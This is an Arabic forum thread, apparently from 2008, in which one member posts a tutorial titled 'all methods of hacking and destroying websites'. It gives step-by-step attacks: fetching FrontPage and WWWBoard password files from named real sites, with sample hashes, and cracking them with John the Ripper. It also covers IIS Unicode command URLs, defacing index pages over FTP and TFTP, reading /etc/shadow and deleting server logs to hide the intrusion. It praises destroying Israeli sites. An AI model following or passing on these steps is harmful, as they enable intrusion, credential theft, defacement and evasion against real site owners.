الجسر
مرحبا بك على الصفحه الخاصه بابناء سنفا
نرحب بك ضيفا وعضو معنا من سنفا او من خارجها
الجسر
مرحبا بك على الصفحه الخاصه بابناء سنفا
نرحب بك ضيفا وعضو معنا من سنفا او من خارجها
الجسر
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


الجسر منتدى شباب سنفا نقد هادف واراء صريحه
 
البوابةالرئيسيةأحدث الصورالتسجيلدخول

 

 جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip

اذهب الى الأسفل 
كاتب الموضوعرسالة
اسامة العرابى
عضو فعال
عضو فعال
اسامة العرابى


ذكر
الابراج : الثور العمر : 36
عدد الرسائل : 469
تاريخ التسجيل : 30/04/2008
الوظيفه : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Pilot10
الهوايات : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Painti10
درجه احترام العضو : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 111010
اوسمه 3 : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
نقاط : 6133
السٌّمعَة : 1

جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
مُساهمةموضوع: جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip   جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Icon_minitimeالإثنين يونيو 09, 2008 2:39 am

السلام عليكم ورحمة الله تعالى و بركاته



جميع طرق اختراق المواقع a a


بسم الله نبدء:

(اختراق المواقع)

1- (اساسيات وتعاريف)
تلنت: (Telnet) - 1
و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى
Start ==> Run ==> telnet
و ستظهر شاشة التلنت.
------------------------------------------------------------------------
برامج السكان: (Scanner) - 2
و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة،
كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت
التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
Shadow Security Scanner و Stealth و Omran Fast
هذه البرامج، برنامج
Scanner
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ
IIS
على ثغرات السي جي اي فقط و منها برامج المسح
CGI
-----------------------------------------------------------------------
اكسبلويت: (Exploits) - 3
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL
، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
Buffer Over Flow Exploits
هناك أنواع من الإكسبلويت ، فمنها ال
CGI Exploits
CGI Bugs
Unicodes Exploits
Buffer Over Flow Exploits
PHP Exploits
DOS Exploits
والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول
Fire Wall
.وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c)
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler
و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------
الجدار الناري: (FireWall) - 4
هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة.
----------------------------------------------------------------------
هو ملف الباسورد المظلل: (Token) - 5
(Shadowed Passwd)
والذي يكون فيه الباسورد على شكل
*
او
x
البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب
Shadow file
تجده في
/etc/shadow
----------------------------------------------------------------------
Anonymouse) - 6
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه.
----------------------------------------------------------------------
Valnerableties) - 7
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟
Valnerable
أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus
أو بوق تراك او غيرها.
----------------------------------------------------------------------
: ملف الباسوورد(passwd file) - 8
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------
الجذر: (root) - 9
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
----------------------------------------------------------------------
السيرفر: (Server) - 10
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون

المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)
-----------------------------------------------------------------------
بوفر أوفر فلو: ( Buffer over Flow ) - 11
وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر .
-----------------------------------------------------------------------
كثير من الهكرز يحبون ان يطلقوا على كل من ال - 12
pc , servers , supercomputers
كلمه
BOX
-----------------------------------------------------------------------
13- النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز
تسطيع ان تطلق على الرئيس هناك كلمه
superuser
وهو يكون روت
وهو الادمين او المدير على النظام....
-----------------------------------------------------------------------
14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليوانا مش محترم وقليل الادبس
الرجوع الى أعلى الصفحة اذهب الى الأسفل
اسامة العرابى
عضو فعال
عضو فعال
اسامة العرابى


ذكر
الابراج : الثور العمر : 36
عدد الرسائل : 469
تاريخ التسجيل : 30/04/2008
الوظيفه : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Pilot10
الهوايات : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Painti10
درجه احترام العضو : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 111010
اوسمه 3 : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
نقاط : 6133
السٌّمعَة : 1

جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
مُساهمةموضوع: رد: جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip   جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Icon_minitimeالإثنين يونيو 09, 2008 2:40 am

15- احنا اخترقنا موقع لازم نمسح خطواتنا علشان لايعرفنا صاحب الموقع ويئذينا كيف؟
/c+del+c:/winnt/system32/logfiles/*.log
نكتب هذا الامر بالدوس
او نروح السي وبعدين فايل ويندوز بعدين فايل
system32
بعدين
امسح ملف اسمة
*
وامتدادة
log
-----------------------------------------------------------------------
16- الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟
تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا
index
افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه
WS_FTP PRO
والبرنامج سهل اللي يبي شرح يقولي

------------------------------------------------------------------------------------------------
17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها )
هذي من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وتلقى:
============================================
1-N-Stealth
تحميل
أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته
**************************************************
*************
2- Shadow Security Scanner
http://www.safety-lab.com/rus/download/download.htm
http://www.bluechillies.com/download.html?sid=7565
برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات
**************************************************
*************
3- Omran Scanner
تحميل
برنامج عربي من برمجة الأخ/عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل
Linux-Unix-NT
**************************************************
*************
4- CGI Scanner
تحميل
مختص في البحث عن ثغرات
cgi
وهو الأفضل في عمل ذلك
**************************************************
*************
5- UniScan
تحميل
كالسابق ولكن هذا البرنامج خاص بفحص ثغرات UNicode
**************************************************
*************
6- Retina Apache Chunked
تحميل
للبحث عن الأجهزة والمواقع التي تملك ثغرة
Apache
**************************************************
*************
7- SamiScan
http://www.angels-bytes.com/?show=t...tion=info&id=20
أداة رائعة وعربية يعرض نظام التشغيل والملقم والعنوان الحقيقي ويحتوي على أربع ملفات لايجادالثغرات
cfusion.txt, cgi.txt, cgi2.txt, NT.txt
**************************************************
*************
8- voideye
تحميل
نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على
sss
**************************************************
*************
الملقمات اشهرها اثنين: - 18
IIS:
من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها).
apache:
من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

-----------------------------------------------------------------
19- اول خطوة في الاختراق هي اخذ المعلومات:
يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.
طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع
http://www.netcraft.net/
ملاحظة: نكتب الموقع من غير
http://
ولا
/
اللي بالاخير
او نستخدم التلنت.
1 - مثال على ملقمات اي اي اس:
راح يطلع لنا التالي
The site http://www.***.org/ is running Microsoft-IIS/5.0 on Windows 2000
طيب الحين عرفنا معلومتين مهمتين
اول شيء انه شغال على الملقم
IIS5.0
ثاني شيء شغال على نظام ويندوز 2000
اول شيء نجرب ثغرات
IIS5.0
عليه
إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000
طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات
IIS
وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
طيب لنفرض انه ماطلع فيها ثغرات؟
نشوف محتويات الموقع نفسه
نشوف إن كان عنده سجل زوار او منتدى او ....
2 - مثال على ملقمات اباتشي:
ناخذ مثال موقع ارانك
http://www.arank.com/
لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:
The site http://www.arank.com/ is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
هنا يهمنا ثلاث اشياء:-
1- الملقم وهو:
apache 1.3.20
2- ودعم فرونت بيج وهذه مليانة ثغرات
FrontPage/5.0.2.2510
3- النظام وهو
Linux
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملقم:
اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد
_vti_pvt
و
_private
هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي
service.pwd
و
users.pwd
و
authors.pwd
و
adminstators.pwd
ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM
وهذا من موقع قودي
http://www.goody.com.sa/_vti_pvt/service.pwd
طيب الحين
goodyco
اليوزر والباسورد مشفر واللي هو
CalXS8USl4TGM
وشلون ينفك؟
ينفك ببرنامج اسمه
john the repaier
( شرح الاستخدام موجود في اخر موضوع في هذا المجلد)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين
اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
telnet
واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال
c
وهذه ماتشتغل إلا عاللينكس فقط.
----------------------------------------------------------------------
20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....)
http://www.ussrback.com/
الموقع هذا خطير جداً جداً تروح ل
EXPLOITS
اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من
c
و
perl
و يوني كود.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
http://neworder.box.sk
هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين
IIS او apache
او منتدى واصدارته او اي برنامج ويطلع لك ثغراته.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
أرشيف لثغرات
www.securiteam.com/exploits/archive.html
أرشيف لثغرات
www.ussrback.com
أرشيف لثغرات
www.secureroot.com
أرشيف لثغرات
www.rootshell.com
أرشيف لثغرات
www.ussrback.com
مواقع لثغرات
www.secureroot.com/category/exploits
---------------------------------------------------------------------
20- هناك انظمة وملقمات كثيرة منها:
Apache (الملقم)
IIS(الملقم)
SunOS(الملقم)
FreeBSD (My BaBe)(الملقم)
OpenBSD(الملقم)
NetBSD(الملقم)
AIX(الملقم)
IRIX(الملقم)
NetScape(الملقم)
Enterprise(الملقم)
Windows/NT/2000/xp (نظام التشغيل)
Linux(نظام الشتغيل )
-------------------------------------------------------------------
له ست مجلدات) 21- (اليونكس

خاص بالملفات الثنائيه يعني اللي تشغل النظام bin
ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd etc
ملفات الاجهزه dev
مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل lib
الملفات الموقته او غير الثابته tmp
اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام usr


--------------------------------------------------------------------
22- (اوامر الاف تي بي)
لكي تعرف ما يحتويه الهارد ديسك Pwd
لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Cd
لكي يتضح لك محتوى المجلد أو الهارد ديسك Ls
لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Get
العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Put
لقطع الإتصال مع الضحية Clos


يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname
----------------------------------------------------------------------------
23- بورتات برامج:-
7 echo
21 telnet
23 ftp
25 smtp
80 http
110 POP
----------------------------------------------------------------------------
c - 24
هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
Linux او Shell Account
----------------------------------------------------------------------------
25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
Error
وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق.
---------------------------------------------------------------------------
الرجوع الى أعلى الصفحة اذهب الى الأسفل
اسامة العرابى
عضو فعال
عضو فعال
اسامة العرابى


ذكر
الابراج : الثور العمر : 36
عدد الرسائل : 469
تاريخ التسجيل : 30/04/2008
الوظيفه : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Pilot10
الهوايات : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Painti10
درجه احترام العضو : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 111010
اوسمه 3 : جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
نقاط : 6133
السٌّمعَة : 1

جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Empty
مُساهمةموضوع: رد: جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip   جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip Icon_minitimeالإثنين يونيو 09, 2008 2:45 am

ل ل
-(كيف تحصل على شيل اكاونت مجانا)

و تنقسم الشيل اكونتس الي نوعين:
1-restricted
2-non-restricted
و الفرق بينهما ان
restricted
مدفوع القيمه و يمكنك من تنفيذ اي
command
اما ال
non restricted
فهو مجاني
و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل
www.cyberarmy.com
او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها
بالتالي:
1-telnet
2-nslookup و الذي يعطيك معلومات عن المضيف
3-ftp
4-finger
4-trace route
5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
6-netstat
7-gcc و هذا كمبيلير للغه البرمجه c
8-gzip لفك ضغط الملفات
9-lynx متصفح للانترنت

------------------------------------------------------------------
تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27
.TFTP
-=-=-=-=-=-=-=-=-=-=-=-=-
قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
index.htm
على الـ
c:\
قم بتشغيل برنامج
TFTP
:ونفذ الامر في الفقرة التالية
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. htm
tftp.exe
وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i"
وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET
وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm
اسم الملف بجهازك
\inetpub\wwwroot\
اسم الدليل في السيرفر
index.htm
اسم الملف على السيرفر
-----------------------------------------------------------------
تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28
www.sitename.com:2082
أو
www.sitename.com/cpanel
هذا في حال كان الموقع يستخدم الـ
CPanel
وهو البرنامج الأكثر شيوعاً ..
ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
وتصير في الداخل.
----------------------------------------------------------------
29- اماكن تواجد ملف باسوورد المواقع:
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز scripts/passwd
----------------------------------------------------------------
30- كيف اتاكد انا الثغر شغالة ولا لا؟
- جرب اللثغرة بواسطة الـ
URL او الـ URI .
----------------------------------------------------------------
31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟
(IIS4.0 on WinNT)
http://www.microsoft.com/ntserver/nt...62/default.asp
(IIS5.0 on Win2000)
www.microsoft.com/windows200...862/default.asp
----------------------------------------------------------------
32 - ما الفرق بين ملف الباسورد المشفر
encryption
والمضلل
shadowed?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملف المضلل
shadow file
يكون مكان كلمة المرور رمز مثل
*
أو
x
أو
#
أو
!
وهذا مثال لها
root:0جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 1Super-User:/:/sbin/sh
لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0جميع طرق اختراق وتدمير المواقع مهم جدا جدا جدا Vip 1Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw
-------------------------------------------------------------------
وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير.
-------------------------------------------------------------------
34 -اذا كان ملف
passwd
مضلل ماذا تفعل؟
الان جميع ملفات
passwd
تكون مضللة ولكن توجد طريقة لفكها
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو
shadow
ماهي اماكن تواجد ملف
shadow
في الأنظمة؟
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي:
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
token
تعني الرمز الذي يوجد في الملف
passwd
وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في
/etc/security/passwd
، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه).
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف
shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج
**********************************************
http://packetstorm.securify.com/Crackers/john-16w.zip
http://www.geocities.com/wildxone2002/john16.zip
http://www.diabolo666-security.com/...er/john-16d.zip
**********************************************
انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو
unshadow passwd.txt shadow.txt
اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة
x
التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x
تكون في ملف الباس
-------------------------------------------------------------------
35- فك تشفير ملف
shadow
asswd بعد دمجه مع ملف
x وهو طريقة فك تشفير ملف
passwd
الدليل الكامل لكسر كلمات السر
برنامج
John the Ripper
لكسر كلمات السر
-----------------------------------------------------------------
برنامج - 36
(John the Ripper)
احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة
(nix*)
وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف
(PASSWD)
بان يكون مضلل وعلى المخترق الحصول على ملف
(SHADOW)
لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
----------------------------------------------------------------
37 - كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب
ftp
يمكنك استخدام احد برامج ال
ftp
منها
ws_ftp
او
CuteFTP 4.2.5 Build 10.4.1
وعنوانه هنا للتحميل
---------------------------------------------------------------------
38 - طريقة تنفيذ الثغرات:

مكان تنفيذ الثغرات
http://www.xxxxx.com/scripts/..&Aa....exe?/c+dir+c:\
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
Dir
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
--------------------------------------------------------------------
2-(شرح الثغرات واستغلالها)
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:

ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل
www.****.com/_vti_pvt
يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف

ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع
http://www.netcraft.net
تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق
http://www.heyerlist.org/garderobe/_vti_pvt
-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:


ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
هنـــــــــا
--------------------------------------------------------------------
3 - شرح ثغرة سي جي اي وكيفية استغلالها:

CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليوانا مش محترم وقليل الادبود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
www.somesite.com
فتكتب الثغرة هكذا في المتفح
www.somesite.com/cgi-bin/passwd.txt
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
